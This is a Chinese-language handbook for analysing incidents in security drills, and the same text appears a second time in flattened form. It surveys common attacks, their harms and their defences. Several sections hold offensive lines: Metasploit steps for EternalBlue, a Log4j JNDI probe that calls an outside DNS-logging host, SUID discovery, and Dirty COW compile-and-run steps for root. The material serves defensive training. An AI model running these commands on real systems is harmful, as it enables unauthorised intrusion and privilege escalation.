攻防演练事件研判篇
字数 3313 2025-08-11 17:40:19

网络安全攻防演练事件研判技术手册

网络安全攻击类型与危害

主要攻击类型

  1. 暴力破解:通过大量尝试破解用户名、密码、验证码等
  2. XSS跨站脚本攻击:在网页中插入恶意脚本控制用户浏览器
  3. 目录遍历:利用漏洞访问未授权的目录和文件
  4. 恶意通信:主机与恶意IP/域名进行通信
  5. 永恒之蓝勒索病毒:利用SMB漏洞传播的恶意软件
  6. 权限提升:从低权限用户提升到管理员权限
  7. SQL注入:通过构造SQL语句获取数据库信息
  8. 文件上传漏洞:上传恶意文件获取服务器控制权
  9. 命令注入:在输入中注入系统命令
  10. 挖矿病毒:利用受害者计算资源进行加密货币挖矿
  11. Log4j远程代码执行:利用Log4j漏洞执行任意代码

攻击危害

  1. 经济损失和业务损失

    • 业务中断、数据泄露
    • 可能导致公司年利润化为泡影
    • 政企单位系统受损影响社会运转

  2. 人身安全

    • 医疗系统被入侵可能危及病人安全
    • 无人驾驶汽车和机场系统被控制

  3. 互联网环境破坏

    • 服务器被变成"肉鸡"攻击其他主机
    • 信用卡、个人隐私数据流入黑产行业

事件研判方法

  1. 日志分析

    • 导出最近7天日志,包含:
      • 源地址、目的地址
      • 事件名称、时间
      • 规则ID、发生次数

  2. 研判依据

    • 动作、地址、事件名称、时间等信息

防护方法

攻击前防护

  1. 渗透测试
  2. 漏洞扫描

攻击后处置

  1. 应急响应
  2. 安全加固

暴力破解攻击

攻击方法

  1. 传统暴力攻击

    • 尝试字母数字组合顺序生成密码
    • 消耗时间长,取决于系统和密码长度

  2. 隐藏页面发现

    • 尝试猜测页面名称,通过响应状态判断存在性

  3. 哈希破解

    • 从给定哈希猜出密码
    • 生成随机密码哈希与目标匹配

  4. 技术变种

    • 穷举法:生成可能的密码全集
    • 字典攻击:使用高频密码字典
    • 彩虹表攻击:交替计算明文和HASH生成哈希链
    • 逆向暴力破解:针对多个用户名尝试一个密码

危害

  1. 密码被盗取,信息泄露
  2. 服务器性能受影响甚至被控制
  3. 设备瘫痪,服务器死机(如SSH暴力破解)

防御措施

  1. 设计安全的验证码
  2. 认证错误次数限制(如错误三次三小时内不可登录)
  3. 双因素认证
  4. 提高安全意识,定期修复漏洞

DDoS攻击

攻击类型

  1. 应用层攻击(第七层)

    • HTTP洪水攻击:大量HTTP请求涌向服务器

  2. 协议攻击

    • 状态耗尽攻击,过度消耗服务器资源

  3. 容量耗尽攻击

    • 消耗目标与互联网间所有可用带宽

症状迹象

  1. 网站或服务突然变慢或不可用
  2. 请求数量不明原因激增
  3. 奇怪的流量模式(如夜间异常访问)

危害

  1. 业务受损,客流量流失
  2. 企业形象受损,用户体验下降
  3. 攻击者趁机进行其他犯罪活动

防护措施

  1. 高防IP:流量清洗过滤
  2. 软件防火墙:过滤异常流量
  3. 黑洞路由
  4. 速率限制
  5. Web应用程序防火墙
  6. Anycast网络扩散

XSS跨站脚本攻击

攻击原理

客户端访问有漏洞网站,执行攻击者放置的恶意代码

攻击类型

  1. 存储型XSS

    • 恶意HTML存储到服务器数据库
    • 危害最大,可持续攻击

  2. 反射型XSS

    • XSS代码出现在URL中
    • 服务器解析后随响应返回执行

  3. DOM型XSS

    • 通过JavaScript操作DOM
    • 全程前端,无后端参与

攻击流程

  1. 攻击者寻找漏洞网站
  2. 发送带有恶意字符串的链接
  3. 用户点击链接
  4. 服务器返回HTML文档
  5. 客户端执行恶意脚本

危害

  1. Cookie劫持
  2. CSRF攻击
  3. XSS钓鱼
  4. 获取用户信息
  5. XSS蠕虫传播

防御措施

  1. 基于特征的防御(如检索JavaScript关键词)
  2. 优化Web应用开发减少漏洞
  3. 对用户提交信息进行过滤
  4. 实现Session标记、验证码系统
  5. 内容规范化,使用httponly的cookie

SQL注入攻击

注入原理

Web应用对用户输入合法性判断不严,添加额外SQL语句

注入类型

  1. 数值型注入
  2. 字符型注入(单引号、双引号、括号)
  3. 盲注
  4. 其他类型(GET、POST、Cookie、HTTP Header注入)

攻击流程

  1. 判断注入类型
  2. 猜解字段数
  3. 确定字段显示顺序
  4. 获取当前数据库
  5. 获取数据库表
  6. 获取表字段名
  7. 下载数据

危害

  1. 盗取用户数据和隐私
  2. 数据库"增删改查"操作
  3. 添加管理员账号
  4. 植入网页木马,篡改网页

防御措施

  1. 提高开发人员安全意识
  2. 技术手段防御
  3. 使用云服务商安全产品
  4. XSS恶意网站信息数据库

文件上传漏洞

漏洞原理

上传功能未严格校验文件后缀和类型,上传webshell

绕过方式

  1. JavaScript检查:截断改后缀名
  2. 服务端检测:MIME类型、扩展名、路径、内容检查

危害

  1. 上传病毒木马
  2. 控制Flash行为
  3. 钓鱼图片欺诈

防御措施

  1. 上传目录设为不可执行
  2. 结合MIME Type、后缀检查
  3. 随机改写文件名和路径
  4. 单独设置文件服务器域名
  5. 限制上传文件大小
  6. 确保上传文件返回正确信息

CSRF跨站请求伪造

攻击原理

盗用用户身份,以用户名义发送恶意请求

攻击方法

  1. 自动发起GET请求(隐藏img标签)
  2. 自动发起POST请求(隐藏表单自动提交)
  3. 引诱用户点击链接(论坛或恶意邮件)

危害

  1. 发送邮件、消息
  2. 盗取账号
  3. 购买商品、转账

防御措施

  1. 验证Token值
  2. 验证HTTP Referer头
  3. XMLHttpRequest附加header
  4. 仅使用JSON API

命令执行漏洞

漏洞原理

调用字符串转代码函数时未考虑用户控制字符串

攻击流程

常见位置:参数值、Cookie值、HTTP头等

多命令执行方式

Windows:

  • |:直接执行后面语句
  • ||:前面出错执行后面
  • &:都执行
  • &&:前为真执行后

Linux:

  • ;:连续执行
  • &:后台执行
  • $():命令替换
  • `:命令替换

危害

  1. 直接控制服务器
  2. 提权控制服务器

防御措施

  1. 避免使用系统执行命令
  2. 使用硬编码固定参数
  3. 动态调整使用选择列表
  4. 过滤或转义危险字符
  5. 禁止不完全控制的危险函数

恶意通信

隐蔽隧道通信

  1. SOCKS隧道

    • 代理服务,支持TCP/UDP
    • 支持一对多连接

  2. ICMP隧道

    • 利用ICMP报文携带数据
    • 高隐蔽性,不占用端口
    • 传输不稳定,带宽低

C&C通信

攻击者通过出方向连接控制内网主机

危害

  1. 横向移动
  2. 机密数据盗取
  3. DDoS攻击
  4. APT攻击

通信方式

  1. 通过IP访问C&C服务器
  2. 通过域名访问
  3. Fast-flux技术
  4. 使用网站/论坛作为C&C
  5. DGA生成随机域名

挖矿病毒

病毒特征

  1. 隐蔽性、破坏性、寄生性
  2. 可执行性、可触发性
  3. 攻击主动性、针对性

症状表现

  1. 工作异常、死机
  2. 程序不能运行
  3. 磁盘空间异常
  4. 系统启动变慢
  5. 数据和程序丢失
  6. 异常声音/画面

挖矿病毒特点

  1. 多样化传播方式
  2. 隐蔽谋利行为
  3. 频繁更新

危害

  1. 占用计算资源
  2. 植入其他病毒
  3. 系统锁死破坏
  4. 内网大规模DDoS

应急响应工具

  1. Process Hacker
  2. Process Explorer
  3. PC Hunter
  4. 火绒剑

Windows检测

  1. CPU占用接近100%
  2. 异常进程

分析命令

wmic process get caption,commandline /value
wmic process where caption="svchost.exe" get caption,commandline /value

Linux检测

  1. 安全平台告警
  2. top查看高CPU占用

处理命令

ps -auxef
netstat -tulnp
kill -9 [pid]
rm -f [exe_path]
crontab -l
cat /etc/anacrontab

永恒之蓝(MS17-010)

漏洞简介

利用Windows SMB漏洞获取系统最高权限

攻击利用

search ms17_010
use 0
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS [目标IP]
run

防御措施

  1. Windows Update更新
  2. 安装补丁
  3. 关闭445端口

Log4j2远程代码执行

漏洞原理

Log4j2默认支持JNDI Lookup,未限制传入内容

利用版本

2.0到2.14.1

漏洞探测

${jndi:ldap://${sys:java.version}.dnslog.cn}

漏洞修复

  1. 升级到2.15.0+
  2. 删除漏洞类: 
    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  3. 禁用lookup功能:
    • 配置%msg{nolookups}
    • JVM参数-Dlog4j2.formatMsgNoLookups=true
    • 配置文件log4j2.formatMsgNoLookups=true
    • 环境变量LOG4J_FORMAT_MSG_NO_LOOKUPS=true
  4. 升级JDK版本

权限提升

Windows提权

  1. 系统漏洞提权
  2. UAC绕过

Linux提权

  1. SUID提权
    find / -perm -u=s -type f 2>/dev/null
  2. 脏牛漏洞(CVE-2016-5195)
    • 影响范围广(Linux内核长期存在)
    • 利用竞态条件破坏COW过程

脏牛复现

  1. 信息收集: 
    ./linux-exploit-suggester.sh
  2. 编译执行exp: 
    g++ -Wall -pedantic -O2 -std=c++11 -pthread -o exp lasc.cpp -lutil
./exp
  3. 获取root权限

提权资源

  1. Windows漏洞扫描工具
  2. Windows内核漏洞利用合集
  3. Linux提权检查脚本
网络安全攻防演练事件研判技术手册 网络安全攻击类型与危害 主要攻击类型 暴力破解 :通过大量尝试破解用户名、密码、验证码等 XSS跨站脚本攻击 :在网页中插入恶意脚本控制用户浏览器 目录遍历 :利用漏洞访问未授权的目录和文件 恶意通信 :主机与恶意IP/域名进行通信 永恒之蓝勒索病毒 :利用SMB漏洞传播的恶意软件 权限提升 :从低权限用户提升到管理员权限 SQL注入 :通过构造SQL语句获取数据库信息 文件上传漏洞 :上传恶意文件获取服务器控制权 命令注入 :在输入中注入系统命令 挖矿病毒 :利用受害者计算资源进行加密货币挖矿 Log4j远程代码执行 :利用Log4j漏洞执行任意代码 攻击危害 经济损失和业务损失 : 业务中断、数据泄露 可能导致公司年利润化为泡影 政企单位系统受损影响社会运转 人身安全 : 医疗系统被入侵可能危及病人安全 无人驾驶汽车和机场系统被控制 互联网环境破坏 : 服务器被变成"肉鸡"攻击其他主机 信用卡、个人隐私数据流入黑产行业 事件研判方法 日志分析 : 导出最近7天日志,包含: 源地址、目的地址 事件名称、时间 规则ID、发生次数 研判依据 : 动作、地址、事件名称、时间等信息 防护方法 攻击前防护 渗透测试 漏洞扫描 攻击后处置 应急响应 安全加固 暴力破解攻击 攻击方法 传统暴力攻击 : 尝试字母数字组合顺序生成密码 消耗时间长,取决于系统和密码长度 隐藏页面发现 : 尝试猜测页面名称,通过响应状态判断存在性 哈希破解 : 从给定哈希猜出密码 生成随机密码哈希与目标匹配 技术变种 : 穷举法:生成可能的密码全集 字典攻击:使用高频密码字典 彩虹表攻击:交替计算明文和HASH生成哈希链 逆向暴力破解:针对多个用户名尝试一个密码 危害 密码被盗取,信息泄露 服务器性能受影响甚至被控制 设备瘫痪,服务器死机(如SSH暴力破解) 防御措施 设计安全的验证码 认证错误次数限制(如错误三次三小时内不可登录) 双因素认证 提高安全意识,定期修复漏洞 DDoS攻击 攻击类型 应用层攻击(第七层) : HTTP洪水攻击:大量HTTP请求涌向服务器 协议攻击 : 状态耗尽攻击,过度消耗服务器资源 容量耗尽攻击 : 消耗目标与互联网间所有可用带宽 症状迹象 网站或服务突然变慢或不可用 请求数量不明原因激增 奇怪的流量模式(如夜间异常访问) 危害 业务受损,客流量流失 企业形象受损,用户体验下降 攻击者趁机进行其他犯罪活动 防护措施 高防IP:流量清洗过滤 软件防火墙:过滤异常流量 黑洞路由 速率限制 Web应用程序防火墙 Anycast网络扩散 XSS跨站脚本攻击 攻击原理 客户端访问有漏洞网站,执行攻击者放置的恶意代码 攻击类型 存储型XSS : 恶意HTML存储到服务器数据库 危害最大,可持续攻击 反射型XSS : XSS代码出现在URL中 服务器解析后随响应返回执行 DOM型XSS : 通过JavaScript操作DOM 全程前端,无后端参与 攻击流程 攻击者寻找漏洞网站 发送带有恶意字符串的链接 用户点击链接 服务器返回HTML文档 客户端执行恶意脚本 危害 Cookie劫持 CSRF攻击 XSS钓鱼 获取用户信息 XSS蠕虫传播 防御措施 基于特征的防御(如检索JavaScript关键词) 优化Web应用开发减少漏洞 对用户提交信息进行过滤 实现Session标记、验证码系统 内容规范化,使用httponly的cookie SQL注入攻击 注入原理 Web应用对用户输入合法性判断不严,添加额外SQL语句 注入类型 数值型注入 字符型注入(单引号、双引号、括号) 盲注 其他类型(GET、POST、Cookie、HTTP Header注入) 攻击流程 判断注入类型 猜解字段数 确定字段显示顺序 获取当前数据库 获取数据库表 获取表字段名 下载数据 危害 盗取用户数据和隐私 数据库"增删改查"操作 添加管理员账号 植入网页木马,篡改网页 防御措施 提高开发人员安全意识 技术手段防御 使用云服务商安全产品 XSS恶意网站信息数据库 文件上传漏洞 漏洞原理 上传功能未严格校验文件后缀和类型,上传webshell 绕过方式 JavaScript检查:截断改后缀名 服务端检测:MIME类型、扩展名、路径、内容检查 危害 上传病毒木马 控制Flash行为 钓鱼图片欺诈 防御措施 上传目录设为不可执行 结合MIME Type、后缀检查 随机改写文件名和路径 单独设置文件服务器域名 限制上传文件大小 确保上传文件返回正确信息 CSRF跨站请求伪造 攻击原理 盗用用户身份,以用户名义发送恶意请求 攻击方法 自动发起GET请求(隐藏img标签) 自动发起POST请求(隐藏表单自动提交) 引诱用户点击链接(论坛或恶意邮件) 危害 发送邮件、消息 盗取账号 购买商品、转账 防御措施 验证Token值 验证HTTP Referer头 XMLHttpRequest附加header 仅使用JSON API 命令执行漏洞 漏洞原理 调用字符串转代码函数时未考虑用户控制字符串 攻击流程 常见位置:参数值、Cookie值、HTTP头等 多命令执行方式 Windows: | :直接执行后面语句 || :前面出错执行后面 & :都执行 && :前为真执行后 Linux: ; :连续执行 & :后台执行 $() :命令替换 ` :命令替换 危害 直接控制服务器 提权控制服务器 防御措施 避免使用系统执行命令 使用硬编码固定参数 动态调整使用选择列表 过滤或转义危险字符 禁止不完全控制的危险函数 恶意通信 隐蔽隧道通信 SOCKS隧道 : 代理服务,支持TCP/UDP 支持一对多连接 ICMP隧道 : 利用ICMP报文携带数据 高隐蔽性,不占用端口 传输不稳定,带宽低 C&C通信 攻击者通过出方向连接控制内网主机 危害 : 横向移动 机密数据盗取 DDoS攻击 APT攻击 通信方式 : 通过IP访问C&C服务器 通过域名访问 Fast-flux技术 使用网站/论坛作为C&C DGA生成随机域名 挖矿病毒 病毒特征 隐蔽性、破坏性、寄生性 可执行性、可触发性 攻击主动性、针对性 症状表现 工作异常、死机 程序不能运行 磁盘空间异常 系统启动变慢 数据和程序丢失 异常声音/画面 挖矿病毒特点 多样化传播方式 隐蔽谋利行为 频繁更新 危害 占用计算资源 植入其他病毒 系统锁死破坏 内网大规模DDoS 应急响应工具 Process Hacker Process Explorer PC Hunter 火绒剑 Windows检测 CPU占用接近100% 异常进程 分析命令 : Linux检测 安全平台告警 top查看高CPU占用 处理命令 : 永恒之蓝(MS17-010) 漏洞简介 利用Windows SMB漏洞获取系统最高权限 攻击利用 防御措施 Windows Update更新 安装补丁 关闭445端口 Log4j2远程代码执行 漏洞原理 Log4j2默认支持JNDI Lookup,未限制传入内容 利用版本 2.0到2.14.1 漏洞探测 漏洞修复 升级到2.15.0+ 删除漏洞类: 禁用lookup功能: 配置 %msg{nolookups} JVM参数 -Dlog4j2.formatMsgNoLookups=true 配置文件 log4j2.formatMsgNoLookups=true 环境变量 LOG4J_FORMAT_MSG_NO_LOOKUPS=true 升级JDK版本 权限提升 Windows提权 系统漏洞提权 UAC绕过 Linux提权 SUID提权 : 脏牛漏洞(CVE-2016-5195) : 影响范围广(Linux内核长期存在) 利用竞态条件破坏COW过程 脏牛复现 : 信息收集: 编译执行exp: 获取root权限 提权资源 Windows漏洞扫描工具 Windows内核漏洞利用合集 Linux提权检查脚本